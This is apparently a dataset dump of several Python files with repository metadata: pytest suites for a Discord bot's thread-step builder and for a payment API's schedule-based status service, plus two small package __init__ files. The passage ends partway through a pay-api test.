| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
324497a8df6b275aeaa31e93f2b6f12a21e1c551
| 16,625
|
py
|
Python
|
tests/common/threads/test_thread_builder.py
|
alexkeating/KevinMalone
|
4dd7fe45c7d0190e2708a74521c40244dd452743
|
[
"MIT"
] | null | null | null |
tests/common/threads/test_thread_builder.py
|
alexkeating/KevinMalone
|
4dd7fe45c7d0190e2708a74521c40244dd452743
|
[
"MIT"
] | 6
|
2021-12-15T22:23:33.000Z
|
2022-03-30T19:55:14.000Z
|
tests/common/threads/test_thread_builder.py
|
alexkeating/KevinMalone
|
4dd7fe45c7d0190e2708a74521c40244dd452743
|
[
"MIT"
] | 6
|
2021-11-10T20:56:20.000Z
|
2021-12-21T16:55:11.000Z
|
import pytest
import hashlib
import json
from bot.common.threads.thread_builder import BaseThread, Step, BaseStep, StepKeys
from tests.test_utils import MockCache
from unittest.mock import MagicMock, AsyncMock
class EmojiLogic(BaseStep):
    """Stub step whose handlers do nothing; used to build test threads."""
    # Flag presumably telling the thread machinery this step reacts to
    # emoji — confirm against BaseThread/BaseStep.
    emoji = True

    async def handle_emoji(self, raw_reaction):
        """No-op emoji handler."""
        pass

    async def save(self, message, guild_id, user_id):
        """No-op save hook."""
        pass
class RedLogic(BaseStep):
    """Stub step named "red"; send() does nothing."""
    name = "red"

    async def send(self, message, user_id):
        # Intentionally a no-op: tests only inspect thread structure.
        pass
class BlueLogic(BaseStep):
    """Stub step named "blue"; send() does nothing."""
    name = "blue"

    async def send(self, message, user_id):
        # Intentionally a no-op: tests only inspect thread structure.
        pass
class LeftLogic(BaseStep):
    """Stub step named "left"; send() does nothing."""
    name = "left"

    async def send(self, message, user_id):
        # Intentionally a no-op: tests only inspect thread structure.
        pass
class RightLogic(BaseStep):
    """Stub step named "right"; send does nothing."""

    name = "right"

    async def send(self, message, user_id):
        pass
class MockLogic(BaseStep):
    """Generic stub step used wherever the step identity does not matter."""

    name = "mock_logic"

    async def send(self, message, user_id):
        pass
class SingleThread(BaseThread):
    """Thread consisting of a single MockLogic step."""

    async def get_steps(self):
        return Step(current=MockLogic())
class MultiThread(BaseThread):
    """Linear thread of three MockLogic steps, no forks."""

    async def get_steps(self):
        return (
            Step(current=MockLogic())
            .add_next_step(MockLogic())
            .add_next_step(MockLogic())
            .build()
        )
class SingleForkThread(BaseThread):
    """Thread of two MockLogic steps that then forks into left/right steps."""

    async def get_steps(self):
        left = LeftLogic()
        right = RightLogic()
        return (
            Step(current=MockLogic())
            .add_next_step(MockLogic())
            .fork([left, right])
            .build()
        )
class MultiForkThread(BaseThread):
    """Thread with nested forks.

    The right branch leads into a second fork (red/blue) hanging off a
    left step, exercising find_step across fork depth.
    """

    async def get_steps(self):
        red = RedLogic()
        blue = BlueLogic()
        # Inner fork: left -> (red | blue); outer fork: mock -> (left | right -> left ...)
        left = Step(current=LeftLogic()).fork([red, blue]).build()
        right = Step(current=RightLogic()).add_next_step(left).build()
        return (
            Step(current=MockLogic())
            .add_next_step(MockLogic())
            .fork([left, right])
            .build()
        )
class EmojiThread(BaseThread):
    """Thread whose only step is an emoji step (cannot be sent directly)."""

    async def get_steps(self):
        # Instantiate the step: every other thread in this module passes an
        # instance; the bare class was passed here by mistake (the class-level
        # ``emoji`` attribute happened to resolve either way, but async methods
        # on a bare class are unbound and would fail if invoked).
        return Step(current=EmojiLogic())
def get_root_hash():
    """Return the root step hash: the sha256 hex digest of an empty string."""
    return hashlib.sha256(b"").hexdigest()
# Test find step #
@pytest.mark.asyncio
async def test_find_single_step():
    """
    Find a step in a thread with a single step.

    The root step's hash must equal the empty-string sha256 from get_root_hash.
    """
    root_hash = get_root_hash()
    steps = await SingleThread(
        user_id="", current_step=root_hash, message_id="", guild_id=""
    ).get_steps()
    step = SingleThread.find_step(steps, root_hash)
    assert step.hash_ == root_hash
@pytest.mark.asyncio
async def test_find_mulitple_step_no_forks():
    """
    Find a step in a thread with no forks and multiple steps.
    """
    # NOTE: "mulitple" typo kept in the name to preserve the test id.
    root_hash = get_root_hash()
    steps = await MultiThread(
        user_id="", current_step=root_hash, message_id="", guild_id=""
    ).get_steps()
    third_step = steps.get_next_step(MockLogic.name).get_next_step(MockLogic.name)
    # NOTE(review): find_step is called on SingleThread even though the steps
    # came from MultiThread — presumably it is thread-independent; confirm.
    step = SingleThread.find_step(steps, third_step.hash_)
    assert step.hash_ == third_step.hash_
@pytest.mark.asyncio
async def test_find_mulitple_step_single_fork():
    """
    Find a step in a thread with a single fork.
    """
    root_hash = get_root_hash()
    steps = await SingleForkThread(
        user_id="", current_step=root_hash, message_id="", guild_id=""
    ).get_steps()
    # Walk into the fork's right branch and look that step up by hash.
    right_step = steps.get_next_step(MockLogic.name).get_next_step(RightLogic.name)
    step = SingleForkThread.find_step(steps, right_step.hash_)
    assert step.hash_ == right_step.hash_
@pytest.mark.asyncio
async def test_find_mulitple_step_multiple_fork():
    """
    Find a step in a thread with multiple (nested) forks.
    """
    root_hash = get_root_hash()
    steps = await MultiForkThread(
        user_id="", current_step=root_hash, message_id="", guild_id=""
    ).get_steps()
    # Deepest step: mock -> right -> left -> blue (inner fork branch).
    blue_step = (
        steps.get_next_step(MockLogic.name)
        .get_next_step(RightLogic.name)
        .get_next_step(LeftLogic.name)
        .get_next_step(BlueLogic.name)
    )
    step = MultiForkThread.find_step(steps, blue_step.hash_)
    assert step.hash_ == blue_step.hash_
# Test Thread __await__ #
@pytest.mark.asyncio
async def test_thread_steps():
    """Awaiting a thread (BaseThread.__await__) populates its steps."""
    root_hash = get_root_hash()
    thread = await MultiForkThread(
        user_id="", current_step=root_hash, message_id="", guild_id=""
    )
    assert thread.steps
@pytest.mark.asyncio
async def test_thread_send_raise():
    """send() on a thread that was never awaited raises.

    NOTE(review): the thread is deliberately NOT awaited here, so its steps
    were never built — presumably that is what makes send() raise; confirm.
    """
    root_hash = get_root_hash()
    thread = MultiForkThread(
        user_id="", current_step=root_hash, message_id="", guild_id=""
    )
    with pytest.raises(Exception):
        thread.send()
# Test thread send #
@pytest.mark.asyncio
async def test_thread_send_emoji_step():
    """
    Throw an error if we try to send on an emoji step
    """
    root_hash = get_root_hash()
    thread = EmojiThread(user_id="", current_step=root_hash, message_id="", guild_id="")
    with pytest.raises(Exception):
        await thread.send()
@pytest.mark.asyncio
async def test_thread_send_previous_step_no_skip():
    """
    A reaction on an emoji step runs the previous step's save when the
    emoji handler does not request a skip (returns None as its second value).
    """
    # Module-level flag flipped by SendLogic.save below.
    global saved
    saved = False

    class EmojiLogic(BaseStep):
        name = "emoji"
        emoji = True

        async def handle_emoji(self, raw_reaction):
            # Second return value None -> no skip, previous save runs.
            return None, None

        async def send(self, message, user_id):
            return None, None

    class SendLogic(BaseStep):
        name = "send"

        async def send(self, message, user_id):
            return None, None

        async def save(self, message, guild_id, user_id):
            global saved
            saved = True

    class MockThread(BaseThread):
        name = "thread"

        async def get_steps(self):
            return Step(current=SendLogic()).add_next_step(EmojiLogic()).build()

    root_hash = get_root_hash()
    cache = MockCache()
    thread = await MockThread(
        user_id="2",
        current_step=root_hash,
        message_id="",
        guild_id="",
        discord_bot=AsyncMock(),
        cache=cache,
    )
    # Resume a second thread positioned on the emoji step and react to it.
    hash_ = thread.step.get_next_step("emoji").hash_
    second_step = await MockThread(
        user_id="2",
        current_step=hash_,
        message_id="",
        guild_id="",
        discord_bot=AsyncMock(),
        cache=cache,
    )
    await second_step.handle_reaction(MagicMock(message_id=""), "")
    assert saved is True
@pytest.mark.asyncio
async def test_thread_send_previous_step_skip(mocker):
    """
    When the emoji handler signals a skip (returns True as its second value),
    the step's save hook is not invoked.
    """
    global saved
    saved = False

    class EmojiLogic(BaseStep):
        name = "emoji"
        emoji = True

        async def handle_emoji(self, raw_reaction):
            # Second return value True -> skip the save.
            return None, True

        async def send(self, message, user_id):
            return None, None

        async def save(self, message, guild_id, user_id):
            global saved
            saved = True

    class MockThread(BaseThread):
        name = "thread"

        async def get_steps(self):
            return Step(current=EmojiLogic())

    root_hash = get_root_hash()
    thread = await MockThread(
        user_id="",
        current_step=root_hash,
        message_id="",
        guild_id="",
        discord_bot=AsyncMock(),
    )
    await thread.handle_reaction(MagicMock(message_id=""), "")
    assert saved is False
@pytest.mark.asyncio
async def test_thread_send_no_previous_step_skip(mocker):
    """
    A skip from the emoji handler bypasses the previous step's save and
    leaves nothing in the cache.
    """
    global saved
    saved = False

    class EmojiLogic(BaseStep):
        name = "emoji"
        emoji = True

        async def handle_emoji(self, raw_reaction):
            # True -> skip; SendLogic.save must not run.
            return None, True

        async def send(self, message, user_id):
            return None, None

    class SendLogic(BaseStep):
        name = "send"

        async def send(self, message, user_id):
            return None, {"example": 0}

        async def save(self, message, guild_id, user_id):
            global saved
            saved = True

    class MockThread(BaseThread):
        async def get_steps(self):
            return Step(current=SendLogic()).add_next_step(EmojiLogic()).build()

    cache = MockCache()
    root_hash = get_root_hash()
    thread = await MockThread(
        user_id="1",
        current_step=root_hash,
        message_id="",
        guild_id="",
        discord_bot=AsyncMock(),
    )
    hash_ = thread.step.get_next_step("emoji").hash_
    second_step = await MockThread(
        user_id="1",
        current_step=hash_,
        message_id="",
        guild_id="",
        cache=cache,
        discord_bot=AsyncMock(),
    )
    await second_step.handle_reaction(MagicMock(message_id=""), "")
    assert saved is False
    assert cache.internal == {}
@pytest.mark.asyncio
async def test_thread_metadata_none(mocker):
    """
    A step whose send returns None metadata keeps the metadata cached by an
    earlier step ({"example": 0} from FirstLogic survives SendLogic).
    """
    class FirstLogic(BaseStep):
        name = "first"

        async def send(self, message, user_id):
            return message, {"example": 0}

    class SendLogic(BaseStep):
        name = "send"

        async def send(self, message, user_id):
            # Returning None metadata should not clobber the cached value.
            return message, None

    class LastLogic(BaseStep):
        name = "last"

        async def send(self, message, user_id):
            return None, None

    class MockThread(BaseThread):
        name = "thread"

        async def get_steps(self):
            return (
                Step(current=FirstLogic())
                .add_next_step(SendLogic())
                .add_next_step(LastLogic())
                .build()
            )

    cache = MockCache()
    root_hash = get_root_hash()
    thread = await MockThread(
        user_id="1",
        current_step=root_hash,
        message_id="",
        guild_id="",
        discord_bot=AsyncMock(),
        cache=cache,
    )
    await thread.send(AsyncMock(message_id="", id="1"))
    hash_ = thread.step.get_next_step("send").hash_
    t2 = await MockThread(
        user_id="1",
        current_step=hash_,
        message_id="",
        guild_id="",
        discord_bot=AsyncMock(),
        cache=cache,
    )
    await t2.send(AsyncMock(message_id="", id="1"))
    assert json.loads(await cache.get("1")).get("metadata") == {"example": 0}
@pytest.mark.asyncio
async def test_thread_metadata_set(mocker):
    """
    A step whose send returns new metadata overwrites the cached metadata
    ({"example": 2} from SendLogic replaces FirstLogic's {"example": 0}).
    """
    class FirstLogic(BaseStep):
        name = "first"

        async def send(self, message, user_id):
            return message, {"example": 0}

    class SendLogic(BaseStep):
        name = "send"

        async def send(self, message, user_id):
            return message, {"example": 2}

    class LastLogic(BaseStep):
        name = "last"

        async def send(self, message, user_id):
            return None, None

    class MockThread(BaseThread):
        name = "thread"

        async def get_steps(self):
            return (
                Step(current=FirstLogic())
                .add_next_step(SendLogic())
                .add_next_step(LastLogic())
                .build()
            )

    cache = MockCache()
    root_hash = get_root_hash()
    thread = await MockThread(
        user_id="1",
        current_step=root_hash,
        message_id="",
        guild_id="",
        discord_bot=AsyncMock(),
        cache=cache,
    )
    await thread.send(AsyncMock(message_id="", id="1"))
    hash_ = thread.step.get_next_step("send").hash_
    t2 = await MockThread(
        user_id="1",
        current_step=hash_,
        message_id="",
        guild_id="",
        discord_bot=AsyncMock(),
        cache=cache,
    )
    await t2.send(AsyncMock(message_id="", id="1"))
    assert json.loads(await cache.get("1")).get("metadata") == {"example": 2}
@pytest.mark.asyncio
async def test_thread_control_hook_end(mocker):
    """
    A control hook returning StepKeys.END ends the thread and clears the
    user's cached thread state.
    """
    class FirstLogic(BaseStep):
        name = "first"

        async def send(self, message, user_id):
            return message, {"example": 0}

    class SendLogic(BaseStep):
        name = "send"

        async def send(self, message, user_id):
            return message, {"example": 2}

        async def control_hook(self, message, user_id):
            # Terminate the thread after this step.
            return StepKeys.END.value

    class LastLogic(BaseStep):
        name = "last"

        async def send(self, message, user_id):
            return None, None

    class MockThread(BaseThread):
        name = "thread"

        async def get_steps(self):
            return (
                Step(current=FirstLogic())
                .add_next_step(SendLogic())
                .add_next_step(LastLogic())
                .build()
            )

    cache = MockCache()
    root_hash = get_root_hash()
    thread = await MockThread(
        user_id="1",
        current_step=root_hash,
        message_id="",
        guild_id="",
        discord_bot=AsyncMock(),
        cache=cache,
    )
    await thread.send(AsyncMock(message_id="", id="1"))
    # After the first step the cache holds state ...
    assert json.loads(await cache.get("1")) is not None
    hash_ = thread.step.get_next_step("send").hash_
    t2 = await MockThread(
        user_id="1",
        current_step=hash_,
        message_id="",
        guild_id="",
        discord_bot=AsyncMock(),
        cache=cache,
    )
    await t2.send(AsyncMock(message_id="", id="1"))
    # ... and the END hook wipes it.
    assert await cache.get("1") is None
@pytest.mark.asyncio
async def test_thread_override_step_and_step(mocker):
    """
    A control hook returning a step name jumps the thread to that step
    (SendLogic redirects to "last", so LastLogic.send runs).
    """
    global third_step
    third_step = False

    class FirstLogic(BaseStep):
        name = "first"

        async def send(self, message, user_id):
            return message, {"example": 0}

    class SendLogic(BaseStep):
        name = "send"

        async def send(self, message, user_id):
            return message, {"example": 2}

        async def control_hook(self, message, user_id):
            # Redirect straight to the step named "last".
            return "last"

    class LastLogic(BaseStep):
        name = "last"

        async def send(self, message, user_id):
            global third_step
            third_step = True
            return None, None

    class MockThread(BaseThread):
        name = "thread"

        async def get_steps(self):
            return (
                Step(current=FirstLogic())
                .add_next_step(SendLogic())
                .add_next_step(LastLogic())
                .build()
            )

    cache = MockCache()
    root_hash = get_root_hash()
    thread = await MockThread(
        user_id="1",
        current_step=root_hash,
        message_id="",
        guild_id="",
        discord_bot=AsyncMock(),
        cache=cache,
    )
    await thread.send(AsyncMock(message_id="", id="1"))
    hash_ = thread.step.get_next_step("send").hash_
    t2 = await MockThread(
        user_id="1",
        current_step=hash_,
        message_id="",
        guild_id="",
        discord_bot=AsyncMock(),
        cache=cache,
    )
    await t2.send(AsyncMock(message_id="", id="1"))
    assert third_step is True
@pytest.mark.asyncio
async def test_thread_trigger(mocker):
    """
    A step flagged with trigger=True makes the thread advance and run the
    following step automatically (LastLogic.send executes after SendLogic).
    """
    global third_step
    third_step = False

    class FirstLogic(BaseStep):
        name = "first"

        async def send(self, message, user_id):
            return message, {"example": 0}

    class SendLogic(BaseStep):
        name = "send"
        # trigger -> the next step fires without waiting for user input.
        trigger = True

        async def send(self, message, user_id):
            return message, {"example": 2}

    class LastLogic(BaseStep):
        name = "last"

        async def send(self, message, user_id):
            global third_step
            third_step = True
            return None, None

    class MockThread(BaseThread):
        name = "thread"

        async def get_steps(self):
            return (
                Step(current=FirstLogic())
                .add_next_step(SendLogic())
                .add_next_step(LastLogic())
                .build()
            )

    cache = MockCache()
    root_hash = get_root_hash()
    thread = await MockThread(
        user_id="1",
        current_step=root_hash,
        message_id="",
        guild_id="",
        discord_bot=AsyncMock(),
        cache=cache,
    )
    await thread.send(AsyncMock(message_id="", id="1"))
    hash_ = thread.step.get_next_step("send").hash_
    t2 = await MockThread(
        user_id="1",
        current_step=hash_,
        message_id="",
        guild_id="",
        discord_bot=AsyncMock(),
        cache=cache,
    )
    await t2.send(AsyncMock(message_id="", id="1"))
    assert third_step is True
| 24.376833
| 88
| 0.595489
| 1,967
| 16,625
| 4.811896
| 0.064565
| 0.053249
| 0.042789
| 0.048494
| 0.874379
| 0.852826
| 0.839725
| 0.803698
| 0.778764
| 0.732911
| 0
| 0.004513
| 0.293594
| 16,625
| 681
| 89
| 24.412628
| 0.801431
| 0.003308
| 0
| 0.770186
| 0
| 0
| 0.020223
| 0
| 0
| 0
| 0
| 0
| 0.031056
| 1
| 0.00207
| false
| 0.014493
| 0.012422
| 0.00207
| 0.252588
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
32c879eb962ca488acfedef0ae7b9199d492eec6
| 167
|
py
|
Python
|
tftf/models/losses/__init__.py
|
yusugomori/tftf
|
e98b9ddffdbaa1fe04320437a47f12f3182ab6f3
|
[
"Apache-2.0"
] | 35
|
2018-08-11T05:01:41.000Z
|
2021-01-29T02:28:47.000Z
|
tftf/models/losses/__init__.py
|
yusugomori/tftf
|
e98b9ddffdbaa1fe04320437a47f12f3182ab6f3
|
[
"Apache-2.0"
] | null | null | null |
tftf/models/losses/__init__.py
|
yusugomori/tftf
|
e98b9ddffdbaa1fe04320437a47f12f3182ab6f3
|
[
"Apache-2.0"
] | 4
|
2018-10-19T14:12:04.000Z
|
2021-01-29T02:28:49.000Z
|
from .binary_crossentropy import binary_crossentropy
from .categorical_crossentropy import categorical_crossentropy
from .mean_squared_error import mean_squared_error
| 41.75
| 62
| 0.91018
| 20
| 167
| 7.2
| 0.4
| 0.25
| 0.222222
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.071856
| 167
| 3
| 63
| 55.666667
| 0.929032
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
3ef5a0c45e957ceb20bdd824e24e34d9ecac689c
| 66
|
py
|
Python
|
mission_systems/navigator_scan_the_code/navigator_scan_the_code/__init__.py
|
jaxnb/NaviGator
|
2edb85cf5eab38f62132b3f467814516d2bb05f3
|
[
"MIT"
] | 27
|
2020-02-17T21:54:09.000Z
|
2022-03-18T17:49:23.000Z
|
mission_systems/navigator_scan_the_code/navigator_scan_the_code/__init__.py
|
jaxnb/NaviGator
|
2edb85cf5eab38f62132b3f467814516d2bb05f3
|
[
"MIT"
] | 325
|
2019-09-11T14:13:56.000Z
|
2022-03-31T00:38:30.000Z
|
mission_systems/navigator_scan_the_code/navigator_scan_the_code/__init__.py
|
ericgorday/NaviGator
|
cc929a8609d7a416d0b8c9a95059e296f669464a
|
[
"MIT"
] | 24
|
2019-09-16T00:29:45.000Z
|
2022-03-06T10:56:38.000Z
|
import scan_the_code_mission
from scan_the_code_mission import *
| 16.5
| 35
| 0.878788
| 11
| 66
| 4.727273
| 0.545455
| 0.269231
| 0.423077
| 0.692308
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.106061
| 66
| 3
| 36
| 22
| 0.881356
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
410ac62fe8398c13366bff8c150b7d1848f395ff
| 12,569
|
py
|
Python
|
pay-api/tests/unit/services/test_status_service.py
|
saravankumarpa/sbc-pay
|
2362549e52c575ab4ea6c19de987f0ebc9d06571
|
[
"Apache-2.0"
] | null | null | null |
pay-api/tests/unit/services/test_status_service.py
|
saravankumarpa/sbc-pay
|
2362549e52c575ab4ea6c19de987f0ebc9d06571
|
[
"Apache-2.0"
] | null | null | null |
pay-api/tests/unit/services/test_status_service.py
|
saravankumarpa/sbc-pay
|
2362549e52c575ab4ea6c19de987f0ebc9d06571
|
[
"Apache-2.0"
] | null | null | null |
# Copyright © 2019 Province of British Columbia
#
# Licensed under the Apache License, Version 2.0 (the 'License');
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an 'AS IS' BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests to assure the Status check service layer.
Test-Suite to ensure that the Status Service layer is working as expected.
"""
from datetime import datetime
from unittest.mock import patch
import pytz
from pay_api.services.status_service import StatusService
def test_get_schedules_with_name(app):
    """Assert that schedules are returned for a known service name."""
    with app.app_context():
        service_name = 'PAYBC'
        get_response = StatusService().get_schedules(service_name=service_name)
        assert get_response[0]['up'] is not None
def test_get_schedules_without_name(app):
    """Assert that no schedules are returned when the service name is None."""
    with app.app_context():
        get_response = StatusService().get_schedules(service_name=None)
        assert get_response is None
def test_get_schedules_with_name_not_exists(app):
    """Assert that no schedules are returned for an unknown service name."""
    with app.app_context():
        service_name = 'PAYBC1'
        get_response = StatusService().get_schedules(service_name=service_name)
        assert get_response is None
def test_get_nearest_datetime(app):
    """Assert that the nearest datetime after the check date is returned as a timestamp."""
    with app.app_context():
        dates: list = list()
        dates.append(datetime(1988, 8, 1, 6, 30))
        dates.append(datetime(1988, 8, 1, 7, 30))
        # Check date precedes both candidates; 6:30 is the nearest.
        check_date: datetime = datetime(1988, 8, 1, 5, 30)
        get_response = StatusService().get_nearest_datetime(dates, check_date)
        assert get_response == datetime(1988, 8, 1, 6, 30).timestamp()
def test_get_nearest_datetime_without_list(app):
    """Assert that 0 is returned for an empty list of dates."""
    with app.app_context():
        dates: list = list()
        check_date: datetime = datetime(1988, 8, 1, 5, 30)
        get_response = StatusService().get_nearest_datetime(dates, check_date)
        assert get_response == 0
def test_get_nearest_datetime_without_date(app):
    """Assert that 0 is returned when the check date is None."""
    with app.app_context():
        dates: list = list()
        dates.append(datetime(1988, 8, 1, 6, 30))
        dates.append(datetime(1988, 8, 1, 7, 30))
        check_date: datetime = None
        get_response = StatusService().get_nearest_datetime(dates, check_date)
        assert get_response == 0
def test_status_check_without_name(app):
    """Assert that schedule_status handles a missing service name with a 'None' status."""
    with app.app_context():
        service_name = None
        check_date = datetime.utcnow()
        get_response = StatusService().schedule_status(service_name=service_name, check_date=check_date)
        assert get_response is not None
        assert get_response['service'] == service_name
        assert get_response['current_status'] == 'None'
def test_status_check_no_schedule(app):
    """Assert that an empty schedule yields an up status with no down time."""
    # sunday 6:30am - 9:30pm
    schedule_json = [{}]
    with app.app_context():
        service_name = 'PAYBC'
        check_date = datetime.utcnow()
        # Patch via context manager. The original started the patcher and then
        # called .stop() on the MagicMock returned by start() — a no-op mock
        # call that never stopped the patcher, leaking the patch into later tests.
        with patch('pay_api.services.status_service.StatusService.get_schedules') as mock_get:
            mock_get.return_value = schedule_json
            get_response = StatusService().schedule_status(service_name=service_name, check_date=check_date)
        assert get_response is not None
        assert get_response['service'] == service_name
        assert get_response['current_status']
        assert get_response['current_down_time'] == 0
def test_status_check_status_false(app):
    """Assert the service reports down, with correct next up/down times."""
    # Sunday 6:30am - 9:30pm
    schedule_json = [{'up': '30 6 * * 6', 'down': '30 21 * * 6'}, {'up': '30 6 * * 7', 'down': '30 21 * * 7'}]
    # 1988-07-31 10:30pm US/Pacific Sunday / 1988-08-01 5:30am UTC
    check_date: datetime = datetime(1988, 8, 1, 5, 30)
    with app.app_context():
        service_name = 'PAYBC'
        # Context-managed patch: the original's mock_get.stop() never stopped the patcher.
        with patch('pay_api.services.status_service.StatusService.get_schedules') as mock_get:
            mock_get.return_value = schedule_json
            get_response = StatusService().schedule_status(service_name=service_name, check_date=check_date)
        assert get_response is not None
        assert get_response['service'] == service_name
        assert not get_response['current_status']
        timezone = pytz.timezone('US/Pacific')
        assert get_response['current_down_time'] == timezone.localize(datetime(1988, 7, 31, 21, 30)).timestamp()
        assert get_response['next_up_time'] == timezone.localize(datetime(1988, 8, 6, 6, 30)).timestamp()
        assert get_response['next_down_time'] == 0
def test_status_check_status_single_schedule(app):
    """Assert the service reports down under a single-entry schedule."""
    # Sunday 6:30am - 9:30pm
    schedule_json = [{'up': '30 6 * * 7', 'down': '30 21 * * 7'}]
    # 1988-07-31 10:30pm US/Pacific Sunday / 1988-08-01 5:30am UTC
    check_date: datetime = datetime(1988, 8, 1, 5, 30)
    with app.app_context():
        service_name = 'PAYBC'
        # Context-managed patch: the original's mock_get.stop() never stopped the patcher.
        with patch('pay_api.services.status_service.StatusService.get_schedules') as mock_get:
            mock_get.return_value = schedule_json
            get_response = StatusService().schedule_status(service_name=service_name, check_date=check_date)
        assert get_response is not None
        assert get_response['service'] == service_name
        assert not get_response['current_status']
def test_status_check_single_schedule(app):
    """Assert the service reports up under a single-entry schedule."""
    # Sunday 6:30am - 9:30pm
    schedule_json = [{'up': '30 6 * * 7', 'down': '30 21 * * 7'}]
    # 1988-07-30 11:30am US/Pacific Saturday / 1988-07-30 6:30pm UTC
    check_date: datetime = datetime(1988, 7, 30, 18, 30)
    with app.app_context():
        service_name = 'PAYBC'
        # Context-managed patch: the original's mock_get.stop() never stopped the patcher.
        with patch('pay_api.services.status_service.StatusService.get_schedules') as mock_get:
            mock_get.return_value = schedule_json
            get_response = StatusService().schedule_status(service_name=service_name, check_date=check_date)
        assert get_response is not None
        assert get_response['service'] == service_name
        assert get_response['current_status']
        timezone = pytz.timezone('US/Pacific')
        assert get_response['current_down_time'] == 0
        assert get_response['next_down_time'] == timezone.localize(datetime(1988, 7, 31, 21, 30)).timestamp()
        assert get_response['next_up_time'] == 0
def test_status_check_single_schedule_down_first(app):
    """Assert down status when the schedule lists 'down' before 'up'."""
    # Sunday 6:30am - 9:30pm
    schedule_json = [{'down': '30 6 * * 6', 'up': '30 21 * * 6'}]
    # 1988-07-30 11:30am US/Pacific Saturday / 1988-07-30 6:30pm UTC
    check_date: datetime = datetime(1988, 7, 30, 18, 30)
    with app.app_context():
        service_name = 'PAYBC'
        # Context-managed patch: the original's mock_get.stop() never stopped the patcher.
        with patch('pay_api.services.status_service.StatusService.get_schedules') as mock_get:
            mock_get.return_value = schedule_json
            get_response = StatusService().schedule_status(service_name=service_name, check_date=check_date)
        assert get_response is not None
        assert get_response['service'] == service_name
        assert not get_response['current_status']
        timezone = pytz.timezone('US/Pacific')
        assert get_response['current_down_time'] == timezone.localize(datetime(1988, 7, 30, 6, 30)).timestamp()
        assert get_response['next_down_time'] == 0
        assert get_response['next_up_time'] == timezone.localize(datetime(1988, 7, 30, 21, 30)).timestamp()
def test_status_check_multiple_schedule(app):
    """Assert up status with the correct next down time across multiple schedules."""
    # Saturday 6:30am - 9:30pm, Sunday 6:30am - 9:30pm
    schedule_json = [{'up': '30 6 * * 6', 'down': '30 21 * * 6'}, {'up': '30 6 * * 7', 'down': '30 21 * * 7'}]
    # 1988-07-30 11:30am US/Pacific Saturday / 1988-07-30 6:30pm UTC
    check_date: datetime = datetime(1988, 7, 30, 18, 30)
    with app.app_context():
        service_name = 'PAYBC'
        # Context-managed patch: the original's mock_get.stop() never stopped the patcher.
        with patch('pay_api.services.status_service.StatusService.get_schedules') as mock_get:
            mock_get.return_value = schedule_json
            get_response = StatusService().schedule_status(service_name=service_name, check_date=check_date)
        assert get_response is not None
        assert get_response['service'] == service_name
        assert get_response['current_status']
        timezone = pytz.timezone('US/Pacific')
        assert get_response['current_down_time'] == 0
        assert get_response['next_up_time'] == 0
        assert get_response['next_down_time'] == timezone.localize(datetime(1988, 7, 30, 21, 30)).timestamp()
def test_status_check_multiple_flexible_schedule(app):
    """Assert up status on a Thursday under a mixed weekly schedule."""
    # Monday - Wedensday 6:30am - 9:30pm
    # Thursday 6:30am -
    # Friday - 9:30pm
    # Saturday 6:30am - 9:30pm
    # Sunday 6:30am - 9:30pm
    schedule_json = [
        {'up': '30 6 * * 1-3', 'down': '30 21 * * 1-3'},
        {'up': '30 6 * * 4', 'down': '30 21 * * 4'},
        {'down': '30 21 * * 5'},
        {'up': '30 6 * * 6', 'down': '30 21 * * 6'},
        {'up': '30 6 * * 7', 'down': '30 21 * * 7'},
    ]
    # 1988-07-28 11:30am US/Pacific Thrusday / 1988-07-28 6:30pm UTC
    check_date: datetime = datetime(1988, 7, 28, 18, 30)
    with app.app_context():
        service_name = 'PAYBC'
        # Context-managed patch: the original started the patcher and never stopped it at all.
        with patch('pay_api.services.status_service.StatusService.get_schedules') as mock_get:
            mock_get.return_value = schedule_json
            get_response = StatusService().schedule_status(service_name=service_name, check_date=check_date)
        assert get_response is not None
        assert get_response['service'] == service_name
        assert get_response['current_status']
        timezone = pytz.timezone('US/Pacific')
        assert get_response['current_down_time'] == 0
        assert get_response['next_up_time'] == 0
        assert get_response['next_down_time'] == timezone.localize(datetime(1988, 7, 28, 21, 30)).timestamp()
def test_status_check_multiple_flexible_schedule_false(app):
    """Assert down status late Friday night under a mixed weekly schedule."""
    # Monday - Wedensday 6:30am - 9:30pm
    # Thursday 6:30am -
    # Friday - 9:30pm
    # Saturday 6:30am - 9:30pm
    # Sunday 6:30am - 9:30pm
    schedule_json = [
        {'up': '30 6 * * 1-3', 'down': '30 21 * * 1-3'},
        {'up': '30 6 * * 4', 'down': '30 21 * * 4'},
        {'down': '30 21 * * 5'},
        {'up': '30 6 * * 6', 'down': '30 21 * * 6'},
